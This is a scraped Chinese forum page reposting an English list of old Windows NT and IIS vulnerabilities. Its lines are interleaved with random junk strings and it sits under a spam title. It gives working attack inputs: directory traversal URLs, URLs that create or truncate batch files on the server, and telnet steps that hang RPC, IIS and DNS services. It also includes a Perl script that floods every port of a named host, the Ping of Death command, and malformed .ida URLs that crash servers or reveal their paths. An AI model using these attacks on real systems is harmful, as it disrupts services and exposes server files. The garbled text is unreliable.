亚洲色一色噜一噜噜噜_在线国产精品一区二区_91国自产拍 精品_国产伦三级一区二区

    • <object id="nlumt"><tt id="nlumt"><pre id="nlumt"></pre></tt></object>

    <legend id="nlumt"><mark id="nlumt"></mark></legend>
    <pre id="nlumt"><tt id="nlumt"><rt id="nlumt"></rt></tt></pre>
    <bdo id="nlumt"><delect id="nlumt"></delect></bdo>

      

      汶上信息港
      
標(biāo)題: NT的漏洞及描述(英文) [打印本頁(yè)]
      

      
作者: 雜七雜八    時(shí)間: 2011-1-13 17:12
      
標(biāo)題: NT的漏洞及描述(英文)
      受影響系統(tǒng):4.0,iis 1.09 x( f; r9 X7 k& u/ F1 e% ^
      
A URL such as 'http://www.domain.com/..\..' allows you to browse and download files outside of the webserver content root directory.
      
" S3 x4 B# m. F' r' Y) k5 K6 I" D( _' ]' ?1 w! Q1 q
      
A URL such as 'http://www.domain.com/scripts..\..\scriptname' allows you to execute the target script.
      
* R! h6 s! F5 O% F2 I: X
      
+ P7 z: A# }2 p* u6 L- v% yBy default user 'Guest' or IUSR_WWW has read access to all files on an NT disk. These files can be browsed, executed or downloaded by wandering guests.
      
, x- j0 S0 d% ?! Z9 s* w" e) M( _
      
--------------------------------------------------------------------$ G( H* D+ G; ]' z$ z
      

      
: [8 W$ A" |0 P$ Q受影響系統(tǒng):4.0$ h  [0 G+ ~% n2 D# @
      
A URL such as http://www.domain.com/scripts/exploit.bat>PATH\target.bat will create a file 'target.bat''.9 J$ k! f. G9 R& `$ J/ ~; Q
      
+ Z; D. }3 _* C( x
      
If the file 'target.bat' exists, the file will be truncated.
      
4 o3 L) U) y8 z) Y/ C; u+ x: F8 S8 p& b* H
      
5 o" u7 A# _. ^4 y5 B" G, J8 h
      
A URL such as http://www.domain.com/scripts/script_name%0A%0D>PATH\target.bat will create an output file 'target.bat''.
      
; Y7 w- L* K3 ]6 o" J8 w6 }5 ]
      
, l! s/ x# `) n, I1 N! A----------------------------------------------------------------------
      
3 v4 P# l: C) y& b. V! o. f* i+ Z/ L; J2 Y( n
      
受影響系統(tǒng):3.51,4.0
      
8 _  w% j; D1 y" H: u. ZMultiple service ports (53, 135, 1031) are vunerable to 'confusion'.
      
/ g9 U1 i6 l( C$ h' D
      
% w6 a8 k2 u  G# q5 D/ ]% @9 kThe following steps;
      
: @( t* }' g$ V/ m; `2 q  Y% O  Z% Z: m3 |$ S5 K+ v: x0 v2 d$ `
      
Telnet to an NT 4.0 system on port 135 , |4 n- d2 }5 X
      
Type about 10 characters followed by a <CR> 
      
$ ~0 [6 a4 w% O0 N; a' zExit Telnet 
      
6 F; H) ]0 T0 B6 w& dresults in a target host CPU utilization of 100%, though at a lower priority than the desktop shell. Multiple services which are confused can result in a locked system.
      
  K+ T' F2 n: a/ v, s
      
( x/ [6 d- v3 I+ t8 F" M" ?3 EWhen launched against port 135, NT Task manager on the target host shows RPCSS.EXE using more than usual process time. To clear this the system must be rebooted.
      
  w  u  C7 y/ r, p6 k* I4 r' i" B2 w1 Z5 _( H- Q) f
      
The above also works on port 1031 (inetinfo.exe) where IIS services must be restarted.
      
0 N  T9 L# W# J
      
4 S5 x" \0 L% b, L, cIf a DNS server is running on the system, this attack against port 53 (dns.exe) will cause DNS to stop functioning.+ o; Q' w5 c; T
      
  L& S/ H2 q6 e
      
The following is modified perl script gleaned from postings in the NTsecurity@iss.net list to test ports on your system (Perl is available from the NT resource kit):
      
  c& o3 Q# }# e7 G* ^# a( C( m
      
# c4 s% p( \+ E/*begin poke code*/
      
+ _% ]- f9 q1 N% S
      
8 t: l! D/ A  T1 I, uuse Socket;
      
- P' F$ l  j0 O# K6 G5 u( i0 ~use FileHandle;
      
/ B# a& v' R- D. ~# x, arequire "chat2.pl";
      
$ l  _5 ~6 e7 s, M3 D' ?# ?2 y2 c% ~" G; p& R. G9 r9 q
      
$systemname = $ARGV[0] && shift;
      
+ e, E; V3 @+ M- v
      
! z* J9 M+ F1 f$verbose = 1; # tell me what you're hitting
      
' Y3 {) M- i- X& h: }4 U$knownports = 1; # don't hit known problem ports+ Q# O) g, v  G- h8 V( l
      
for ($port = $0; $port<65535; $port++) 
      
) C4 j) E- o  M{0 r- a, L0 ?' U& r$ V
      

      
  d& d; L' o6 x3 f# z& ~
      
1 B$ |( n3 @) E$ y. Q# d7 ]; Eif ($knownports && ($port == 53 || $port == 135 || $port== 1031)) {! Q' k8 Q% ?/ t( b; H
      
next;
      
  k- [" m9 ?$ Z/ q* E: U}2 M2 q8 D# X& X7 y7 L/ p
      
$fh = chat::open_port($systemname, $port);3 U6 u9 k! B2 h# T9 `' N
      
chat::print ($fh,"This is about ten characters or more");
      
& O$ r4 o% l2 S6 y1 Uif ($verbose) {  A5 K/ D5 Y- t! w3 J% Z6 K
      
print "Trying port: $port\n";  M9 q9 ]' M% ]" h( |
      
} * L7 m2 {$ a/ s7 F! G% J: x0 R
      
chat::close($fh);; O# @* Q' ^$ Y
      
0 _7 U9 R4 i- i' U+ z8 C, A
      
}
      
+ N6 Q* Y: q5 ]# L) ^" @8 R5 w9 B( D- C2 t2 @5 L! G
      

      
: A4 g2 ]2 H2 [( f& v  o/*end poke code*/" `. B$ E9 u& Y- J& T& C
      
8 Z, m9 U- d6 o% a- _0 |: h
      
Save the above text as c:\perl\bin\poke, run like this: C:\perl\bin> perl poke servername
      
2 e0 }. W+ }0 {% I! O
      
% {( o! ]: Q% c1 Y--------------------------------------------------------------------------------
      
) z2 d) G* _+ C0 N$ X$ }* B$ Y/ M* t) M- ^4 L
      
受影響系統(tǒng):4.00 C% ~2 Z2 j, g+ ]  E  U
      
Using a telnet application to get to a webserver via HTTP port 80, and typing "GET ../.." <cr> will crash IIS.
      
" Q% ~3 q6 y) F& v" y2 U- P: j0 ~) T) C# Y1 _! ^! @0 q; c' U$ p$ A
      
This attack causes Dr. Watson to display an alert window and to log an error: 
      
" l4 f; N% M* S, Q# p# F' u: w, ?9 F
      
"The application, exe\inetinfo.dbg, generated an application error The error occurred on date@ time The exception generated was c0000005 at address 53984655 (TCP_AUTHENT::TCP_AUTHENT"! X( J# }, l& ^4 r: J" }! P* C& G2 V
      
) K2 {( t. N. N* V3 Y- ?' g3 c
      
--------------------------------------------------------------------------------  e; L+ l' Y* B; C8 q
      

      
. H9 b( G3 m/ g% I) \) r受影響系統(tǒng):3.51,4.0, Z1 S" X) U* E5 f  I
      
Large packet pings (PING -l 65527 -s 1 hostname) otherwise known as 'Ping of Death' can cause a blue screen of death on 3.51 systems:) O7 K- B+ m  a
      

      
! _  S" n) Z' [4 D; @1 C! h. U2 MSTOP: 0X0000001E
      
7 Q7 _' o) l. H% g8 n1 _: e$ BKMODE_EXCEPTION_NOT_HANDLED - TCPIP.SYS
      
9 A. W0 C. b" Z# R& N: l4 [0 a1 f0 p& Y5 L' }8 }) r
      
-OR-% O" Y9 I8 V/ O$ c7 n
      

      
( x$ v" ]( w3 HSTOP: 0x0000000A' _, q. X$ X5 {
      
IRQL_NOT_LESS_OR_EQUAL - TCPIP.SYS8 E) ]* t7 v7 w; H
      

      
. a) h  A) F0 nNT 4.0 is vunerable sending large packets, but does not crash on receiving large packets.
      
8 m7 f* E0 q: j7 s
      
' a/ n# m$ b+ N  L) ^5 z- d--------------------------------------------------------------------------------
      
, A) x6 i' z4 {  K5 b$ T. Z9 C
      
3 d, b; C! _2 f2 uMicrosoft IIS 5.0 has problems handling a specific form of URL ending with "ida". The problem can have 2 kinds of results. One possible outcome is that the server responds with a message like "URL String too long"; "Cannot find the specified path" or the like. The other possible result is that the server terminates with an "Access Violation" message (effectively causing a Denial of Service attack against the server). Vulnerable are all IIS versions (up to and including IIS 5.0). When a remote attacker issues a URL request with the malformed URL: http://www.example.com/...[25kb of '.']...ida The server will either crash (causing an effective DoS attack) or report its current directory location (revealing the directory structure). ; I. M& J# l/ ], w/ e2 e: F+ o& I
      

      
5 q& z, [8 y$ i' q--------------------------------------------------------3 Y: n$ F& ~% l' `3 y5 i
      
" N  R& W% K/ ~( z2 \% k: p4 c
      
IIS, Microsoft's Internet Information Server, can be used to reveal the true path of the files (where they physically reside on the local hard drive), by requesting a non-existing file with an IDQ/IDA extension. By requesting a URL such as: http://www.microsoft.com/anything.ida Or: http://www.microsoft.com/anything.idq A remote user will get a response that looks like: 'The IDQ d:\http\anything.idq could not be found' Such a response allows him to gain further knowledge on how the web site is organized and the directory structure of the server




      

      

      歡迎光臨 汶上信息港 (http://www.loveproblemguru.com/)

Powered by Discuz! X3.5